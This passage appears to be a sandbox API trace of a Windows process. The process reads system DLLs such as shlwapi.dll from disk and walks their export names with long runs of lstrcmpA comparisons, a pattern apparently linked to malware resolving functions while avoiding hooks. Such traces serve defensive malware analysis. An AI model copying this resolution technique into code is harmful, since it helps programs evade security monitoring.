(lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0139.600] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0139.601] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0139.602] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0139.602] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0139.605] GetProcessHeap () returned 0x530000 [0139.605] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x530000) returned 1 [0139.605] GetProcessHeap () returned 0x530000 [0139.605] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x549320 [0139.605] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0139.605] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0139.605] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0139.605] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0139.605] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0139.979] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0139.979] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0139.979] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0139.979] GetProcessHeap () returned 0x530000 [0139.979] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x51148) returned 0x2d55030 [0139.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0139.980] ReadFile (in: hFile=0x17c, lpBuffer=0x2d55030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d55030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0139.985] CloseHandle (hObject=0x17c) returned 1 [0139.986] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0139.986] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0139.986] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0139.986] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0139.986] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0139.986] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0139.986] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0139.986] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0139.986] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0139.986] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0139.986] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0139.987] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0139.987] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0139.987] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0139.987] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0139.987] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0139.987] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0139.987] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0139.987] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0139.987] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0139.987] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0139.987] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0139.988] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0139.988] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0139.988] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0139.988] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0139.988] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0139.989] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0139.989] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0139.989] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0139.989] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0139.990] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0139.990] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0139.990] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0139.990] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0139.990] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0139.990] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0139.991] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0139.991] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0139.992] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0139.992] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0139.992] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0139.992] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0139.992] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0139.992] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0139.992] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0139.992] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0139.992] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0139.992] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0139.993] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 